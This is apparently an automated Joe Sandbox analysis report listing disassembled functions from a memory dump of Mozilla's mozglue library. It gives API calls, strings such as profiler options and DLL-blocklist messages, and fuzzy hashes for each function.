Instruction Fuzzy Hash: 7421D830E00348DFEF108A59DD56BAF7BB8EB84359F014229E511961C0D7749958CB6A

Function 666277A0 Relevance: 6.3, APIs: 4, Instructions: 291timeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 66627A81
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 66627A93

Part of subcall function 665F5C50: GetTickCount64.KERNEL32 ref: 665F5D40
Part of subcall function 665F5C50: EnterCriticalSection.KERNEL32(6665F688), ref: 665F5D67

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 66627AA1

Part of subcall function 665F5C50: __aulldiv.LIBCMT ref: 665F5DB4
Part of subcall function 665F5C50: LeaveCriticalSection.KERNEL32(6665F688), ref: 665F5DED

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 66627B31

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
String ID:
API String ID: 4054851604-0
Opcode ID: d38cc4259282a49457cc21ddd12becf76004fe88cef7ea69edeed8f0ee01f268
Instruction ID: 3fc790491986fe608e4dae46a2ea74513398c8de3c9f4e46dcee9435e4d6c4d3
Opcode Fuzzy Hash: d38cc4259282a49457cc21ddd12becf76004fe88cef7ea69edeed8f0ee01f268
Instruction Fuzzy Hash: 7FB16A35A083918BDB14CF24E450A5FBBE6BFC9314F158A2CE99567291DB70E906CF82

Function 6663B700 Relevance: 4.5, APIs: 3, Instructions: 41nativeCOMMON

Download Yara Rule

APIs

NtQueryVirtualMemory.NTDLL ref: 6663B720
RtlNtStatusToDosError.NTDLL ref: 6663B75A
RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,00000000,00000000,?,0000001C,6660FE3F,00000000,00000000,?,?,00000000,?,6660FE3F), ref: 6663B760

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Error$LastMemoryQueryStatusVirtualWin32
String ID:
API String ID: 304294125-0
Opcode ID: 8d1e7b75c455ed8c55be39b88ec01ca3cdd996167b9a8b7441efcbdfe85ca715
Instruction ID: ffd6eb7b976d52e725b7c6a20f0cec233e4186f8f51de4f72154666ac2e3e90b
Opcode Fuzzy Hash: 8d1e7b75c455ed8c55be39b88ec01ca3cdd996167b9a8b7441efcbdfe85ca715
Instruction Fuzzy Hash: 5CF0AFB090021CAEEF059BA1EC85BEE7BBDDB18319F00913AE512721C0D774A588C7A4

Function 6663B8C0 Relevance: 3.1, APIs: 2, Instructions: 118nativeCOMMON

Download Yara Rule

APIs

rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,665E03D4,?), ref: 6663B955
NtQueryVirtualMemory.NTDLL ref: 6663B9A5

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: MemoryQueryVirtualrand_s
String ID:
API String ID: 1889792194-0
Opcode ID: df7fd92180c9c38c6893b24370c025b643165cc4ec8dccf54717c6ccaee92fa3
Instruction ID: 50f4ce48ec566ce37ba978372c8597a11567aa98d32295bcb7fa2514be66f50c
Opcode Fuzzy Hash: df7fd92180c9c38c6893b24370c025b643165cc4ec8dccf54717c6ccaee92fa3
Instruction Fuzzy Hash: 0241B471E0062D9FDF08CFA9E881A9EBBB6EF88354F14812AE505A7344DB309C45CB90

Function 6661CC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,665E582D), ref: 6661CC27
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,665E582D), ref: 6661CC3D
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6664FE98,?,?,?,?,?,665E582D), ref: 6661CC56
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,665E582D), ref: 6661CC6C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,665E582D), ref: 6661CC82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,665E582D), ref: 6661CC98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,665E582D), ref: 6661CCAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6661CCC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6661CCDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6661CCEC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6661CCFE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6661CD14
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6661CD82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6661CD98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6661CDAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6661CDC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6661CDDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6661CDF0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6661CE06
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6661CE1C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6661CE32
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6661CE48
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6661CE5E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6661CE74
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6661CE8A

Strings

nostacksampling, xrefs: 6661CD7C
Unrecognized feature "%s"., xrefs: 6661CEA0
stackwalk, xrefs: 6661CCF8
markersallthreads, xrefs: 6661CE42
notimerresolutionchange, xrefs: 6661CE00
fileio, xrefs: 6661CC92
unregisteredthreads, xrefs: 6661CE58
mainthreadio, xrefs: 6661CC7C
audiocallbacktracing, xrefs: 6661CDD4
samplingallthreads, xrefs: 6661CE2C
seqstyle, xrefs: 6661CCE6
cpuallthreads, xrefs: 6661CE16
jsallocations, xrefs: 6661CD0E
screenshots, xrefs: 6661CCD4
preferencereads, xrefs: 6661CD92
processcpu, xrefs: 6661CE6E
power, xrefs: 6661CE84
fileioall, xrefs: 6661CCA8
leaf, xrefs: 6661CC66
nativeallocations, xrefs: 6661CDA8
ipcmessages, xrefs: 6661CDBE
java, xrefs: 6661CC37
default, xrefs: 6661CC21
noiostacks, xrefs: 6661CCBE

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: strcmp
String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
API String ID: 1004003707-2809817890
Opcode ID: 529bc7fb1459409ff8696cd5790455b10bf96f2a649527da30bbd51d91f5c9cf
Instruction ID: ec3856a19f6d1c4a491000b0f5a733619cd65377a5b7c1276dd0c2dbe02af6c5
Opcode Fuzzy Hash: 529bc7fb1459409ff8696cd5790455b10bf96f2a649527da30bbd51d91f5c9cf
Instruction Fuzzy Hash: 805159D1D8D61552FB06212DBD22BAE9C45DFA3246F008036ED1BA1680FB1DD629C5FF

Function 665E47C0 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 232threadCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 665E4801
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 665E4817
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 665E482D
__Init_thread_footer.LIBCMT ref: 665E484A

Part of subcall function 6660AB3F: EnterCriticalSection.KERNEL32(6665E370,?,?,665D3527,6665F6CC,?,?,?,?,?,?,?,?,665D3284), ref: 6660AB49
Part of subcall function 6660AB3F: LeaveCriticalSection.KERNEL32(6665E370,?,665D3527,6665F6CC,?,?,?,?,?,?,?,?,665D3284,?,?,665F56F6), ref: 6660AB7C

GetCurrentThreadId.KERNEL32 ref: 665E485F
GetCurrentThreadId.KERNEL32 ref: 665E487E
AcquireSRWLockExclusive.KERNEL32(6665F4B8), ref: 665E488B
free.MOZGLUE(?), ref: 665E493A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 665E4956
free.MOZGLUE(00000000), ref: 665E4960
ReleaseSRWLockExclusive.KERNEL32(6665F4B8), ref: 665E499A

Part of subcall function 6660AB89: EnterCriticalSection.KERNEL32(6665E370,?,?,?,665D34DE,6665F6CC,?,?,?,?,?,?,?,665D3284), ref: 6660AB94
Part of subcall function 6660AB89: LeaveCriticalSection.KERNEL32(6665E370,?,665D34DE,6665F6CC,?,?,?,?,?,?,?,665D3284,?,?,665F56F6), ref: 6660ABD1

free.MOZGLUE(?), ref: 665E49C6
free.MOZGLUE(?), ref: 665E49E9

Part of subcall function 665F5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 665F5EDB
Part of subcall function 665F5E90: memset.VCRUNTIME140(ewcf,000000E5,?), ref: 665F5F27
Part of subcall function 665F5E90: LeaveCriticalSection.KERNEL32(?), ref: 665F5FB2

Strings

MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 665E47FC
[I %d/%d] profiler_shutdown, xrefs: 665E4A06
MOZ_BASE_PROFILER_LOGGING, xrefs: 665E4828
MOZ_PROFILER_SHUTDOWN, xrefs: 665E4A42
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 665E4812

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CriticalSection$free$EnterLeavegetenv$CurrentExclusiveLockThread$AcquireInit_thread_footerReleasememset
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_SHUTDOWN$[I %d/%d] profiler_shutdown
API String ID: 1340022502-4194431170
Opcode ID: 948737f63ddd925140e8151273cfcf10dfea1e6d0c6091bff4136e2dbdb9ebf3
Instruction ID: 3e48bba70a5c4078be1c3938b2042cfde6eb0ecbce1d46f395d86a65afddb3b9
Opcode Fuzzy Hash: 948737f63ddd925140e8151273cfcf10dfea1e6d0c6091bff4136e2dbdb9ebf3
Instruction Fuzzy Hash: 0E81CD71D001208BEF04DF29E99771A3BA7ABC2329F150679DA16D7282E731E851CF96

Function 665E4470 Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 178libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 665E4730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,665E44B2,6665E21C,6665F7F8), ref: 665E473E
Part of subcall function 665E4730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 665E474A

GetModuleHandleW.KERNEL32(WRusr.dll), ref: 665E44BA
LoadLibraryW.KERNEL32(kernel32.dll), ref: 665E44D2
InitOnceExecuteOnce.KERNEL32(6665F80C,665DF240,?,?), ref: 665E451A
GetModuleHandleW.KERNEL32(user32.dll), ref: 665E455C
LoadLibraryW.KERNEL32(?), ref: 665E4592
InitializeCriticalSection.KERNEL32(6665F770), ref: 665E45A2
moz_xmalloc.MOZGLUE(00000008), ref: 665E45AA
moz_xmalloc.MOZGLUE(00000018), ref: 665E45BB
InitOnceExecuteOnce.KERNEL32(6665F818,665DF240,?,?), ref: 665E4612
?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 665E4636
LoadLibraryW.KERNEL32(user32.dll), ref: 665E4644
memset.VCRUNTIME140(?,00000000,00000114), ref: 665E466D
VerSetConditionMask.NTDLL ref: 665E469F
VerSetConditionMask.NTDLL ref: 665E46AB
VerSetConditionMask.NTDLL ref: 665E46B2
VerSetConditionMask.NTDLL ref: 665E46B9
VerSetConditionMask.NTDLL ref: 665E46C0
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 665E46CD
GetModuleHandleW.KERNEL32(00000000), ref: 665E46F1
GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 665E46FD

Strings

kernel32.dll, xrefs: 665E44CD
user32.dll, xrefs: 665E4557, 665E463F
l, xrefs: 665E4578
NativeNtBlockSet_Write, xrefs: 665E46F7
Gef, xrefs: 665E44FC
WRusr.dll, xrefs: 665E44B5

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
String ID: Gef$NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
API String ID: 1702738223-3268193084
Opcode ID: 01fbb429e4bafbd26b8a33a8d1897e556c4c594d4b47db4de551e7c3911ee5ef
Instruction ID: 6993d547ab4525229d2f93f161953085efe586b8aa34f4dab47741240805f170
Opcode Fuzzy Hash: 01fbb429e4bafbd26b8a33a8d1897e556c4c594d4b47db4de551e7c3911ee5ef
Instruction Fuzzy Hash: B361D4B0900394AFEF11DF26FC4BBA57BBAEBC6308F048099E6449B241D7B19955CF91

Function 665E19A0 Relevance: 44.2, APIs: 24, Strings: 1, Instructions: 407COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6665F760), ref: 665E19BD
GetCurrentProcess.KERNEL32 ref: 665E19E5
GetLastError.KERNEL32 ref: 665E1A27
moz_xmalloc.MOZGLUE(?), ref: 665E1A41
memset.VCRUNTIME140(00000000,00000000,?), ref: 665E1A4F
GetLastError.KERNEL32 ref: 665E1A92
moz_xmalloc.MOZGLUE(?), ref: 665E1AAC
memset.VCRUNTIME140(00000000,00000000,?), ref: 665E1ABA
LocalFree.KERNEL32(?), ref: 665E1C69
free.MOZGLUE(?), ref: 665E1C8F
free.MOZGLUE(?), ref: 665E1C9D
CloseHandle.KERNEL32(?), ref: 665E1CAE
ReleaseSRWLockExclusive.KERNEL32(6665F760), ref: 665E1D52
GetLastError.KERNEL32 ref: 665E1DA5
GetLastError.KERNEL32 ref: 665E1DFB
GetLastError.KERNEL32 ref: 665E1E49
GetLastError.KERNEL32 ref: 665E1E68
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 665E1E9B

Part of subcall function 665E2070: LoadLibraryW.KERNEL32(combase.dll,665E1C5F), ref: 665E20AE
Part of subcall function 665E2070: GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 665E20CD
Part of subcall function 665E2070: __Init_thread_footer.LIBCMT ref: 665E20E1

memset.VCRUNTIME140(?,00000000,00000110), ref: 665E1F15
VerSetConditionMask.NTDLL ref: 665E1F46
VerSetConditionMask.NTDLL ref: 665E1F52
VerSetConditionMask.NTDLL ref: 665E1F59
VerSetConditionMask.NTDLL ref: 665E1F60
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 665E1F6D

Strings

D, xrefs: 665E1B57

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: ErrorLast$ConditionMask$freememset$ExclusiveLockmoz_xmalloc$AcquireAddressCloseCurrentFreeHandleInfoInit_thread_footerLibraryLoadLocalProcProcessReleaseVerifyVersion
String ID: D
API String ID: 290179723-2746444292
Opcode ID: ee76915b3874d8d95cfa88b0c414153c65ce4d8dab449f8c909f454f0c825c30
Instruction ID: a7b4afbd930046a0c679a7d6b7430e28078e6f7210a8513e655a319b5fb815ce
Opcode Fuzzy Hash: ee76915b3874d8d95cfa88b0c414153c65ce4d8dab449f8c909f454f0c825c30
Instruction Fuzzy Hash: 58F16071D00765ABEF20DF65DD4ABAAB7B6FF49700F004599EA09A7240D7749D80CF90

Function 665FBB80 Relevance: 38.9, APIs: 17, Strings: 5, Instructions: 388stringCOMMON

Download Yara Rule

APIs

strchr.VCRUNTIME140(00000000,0000002E), ref: 665FBC5A
strchr.VCRUNTIME140(00000001,0000002E), ref: 665FBC6E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(accelerator.dll,?), ref: 665FBC9E
memset.VCRUNTIME140(?,00000000,00000110), ref: 665FBE33
VerSetConditionMask.NTDLL ref: 665FBE65
VerSetConditionMask.NTDLL ref: 665FBE71
VerSetConditionMask.NTDLL ref: 665FBE7D
VerSetConditionMask.NTDLL ref: 665FBE89
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 665FBE97
memset.VCRUNTIME140(?,00000000,00000110), ref: 665FBEE4
VerSetConditionMask.NTDLL ref: 665FBF15
VerSetConditionMask.NTDLL ref: 665FBF21
VerSetConditionMask.NTDLL ref: 665FBF2D
VerSetConditionMask.NTDLL ref: 665FBF39
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 665FBF47

Part of subcall function 6663AAE0: GetCurrentThreadId.KERNEL32 ref: 6663AAF8
Part of subcall function 6663AAE0: EnterCriticalSection.KERNEL32(6665F770,?,665FBF9F), ref: 6663AB08
Part of subcall function 6663AAE0: LeaveCriticalSection.KERNEL32(6665F770,?,?,?,?,?,?,?,?,665FBF9F), ref: 6663AB6B

free.MOZGLUE(00000000), ref: 665FBFF0
_strtoui64.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000010), ref: 665FC014

Part of subcall function 6663AC20: CreateFileW.KERNEL32 ref: 6663AC52
Part of subcall function 6663AC20: CreateFileMappingW.KERNEL32 ref: 6663AC7D
Part of subcall function 6663AC20: GetSystemInfo.KERNEL32 ref: 6663AC98
Part of subcall function 6663AC20: MapViewOfFile.KERNEL32 ref: 6663ACB0
Part of subcall function 6663AC20: GetSystemInfo.KERNEL32 ref: 6663ACCD
Part of subcall function 6663AC20: MapViewOfFile.KERNEL32 ref: 6663AD05
Part of subcall function 6663AC20: UnmapViewOfFile.KERNEL32 ref: 6663AD1C
Part of subcall function 6663AC20: CloseHandle.KERNEL32 ref: 6663AD28
Part of subcall function 6663AC20: UnmapViewOfFile.KERNEL32 ref: 6663AD37
Part of subcall function 6663AC20: CloseHandle.KERNEL32 ref: 6663AD43

Part of subcall function 6663AE70: GetCurrentThreadId.KERNEL32 ref: 6663AE85
Part of subcall function 6663AE70: EnterCriticalSection.KERNEL32(6665F770,?,665FC034), ref: 6663AE96
Part of subcall function 6663AE70: LeaveCriticalSection.KERNEL32(6665F770,?,?,?,?,665FC034), ref: 6663AEBD

Strings

LdrLoadDll: Blocking load of '%s' -- see http://www.mozilla.com/en-US/blocklist/, xrefs: 665FBDDD
LdrLoadDll: Ignoring the REDIRECT_TO_NOOP_ENTRYPOINT flag, xrefs: 665FBF5B
0df, xrefs: 665FBC93
LdrLoadDll: Blocking load of '%s' (SearchPathW didn't find it?), xrefs: 665FBFCF
accelerator.dll, xrefs: 665FBC8E, 665FBC9D

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: ConditionMask$File$CriticalInfoSectionView$CloseCreateCurrentEnterHandleLeaveSystemThreadUnmapVerifyVersionmemsetstrchr$Mapping_strtoui64freestrcmp
String ID: 0df$LdrLoadDll: Blocking load of '%s' (SearchPathW didn't find it?)$LdrLoadDll: Blocking load of '%s' -- see http://www.mozilla.com/en-US/blocklist/$LdrLoadDll: Ignoring the REDIRECT_TO_NOOP_ENTRYPOINT flag$accelerator.dll
API String ID: 3889411031-3261258721
Opcode ID: 7ff1de0a557bc94f5741f7753ba006542430a1dafc3d5c6db8e95d00346a907b
Instruction ID: faf2d90fb83f11b1a172cbbb18df10c18cabe4ec633b443729a1277ba9e2088a
Opcode Fuzzy Hash: 7ff1de0a557bc94f5741f7753ba006542430a1dafc3d5c6db8e95d00346a907b
Instruction Fuzzy Hash: 9BE1F871914351DBEB10EF24DC82B5BBBF6EF85304F00892DE98597280DB709946CF92

Function 6661E8B0 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 297threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 66617090: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,6661B9F1,?), ref: 66617107

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6661DCF5), ref: 6661E92D
GetCurrentThreadId.KERNEL32 ref: 6661EA4F
AcquireSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661EA5C
ReleaseSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661EA80
GetCurrentThreadId.KERNEL32 ref: 6661EA8A
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6661DCF5), ref: 6661EA92
GetCurrentThreadId.KERNEL32 ref: 6661EB11
AcquireSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661EB1E
memset.VCRUNTIME140(?,00000000,000000E0), ref: 6661EB3C
ReleaseSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661EB5B

Part of subcall function 66615710: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6661EB71), ref: 666157AB

Part of subcall function 6660CBE8: GetCurrentProcess.KERNEL32(?,665D31A7), ref: 6660CBF1
Part of subcall function 6660CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,665D31A7), ref: 6660CBFA

Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,665E4A68), ref: 6661945E
Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 66619470
Part of subcall function 66619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 66619482
Part of subcall function 66619420: __Init_thread_footer.LIBCMT ref: 6661949F

GetCurrentThreadId.KERNEL32 ref: 6661EBA4
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6661EBAC

Part of subcall function 666194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 666194EE
Part of subcall function 666194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 66619508

GetCurrentThreadId.KERNEL32 ref: 6661EBC1
AcquireSRWLockExclusive.KERNEL32(6665F4B8,?,?,00000000), ref: 6661EBCE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6661EBE5
ReleaseSRWLockExclusive.KERNEL32(6665F4B8,00000000), ref: 6661EC37
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6661EC46
CloseHandle.KERNEL32(?), ref: 6661EC55
free.MOZGLUE(00000000), ref: 6661EC5C

Strings

[I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6661EA9B
[I %d/%d] profiler_start, xrefs: 6661EBB4

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

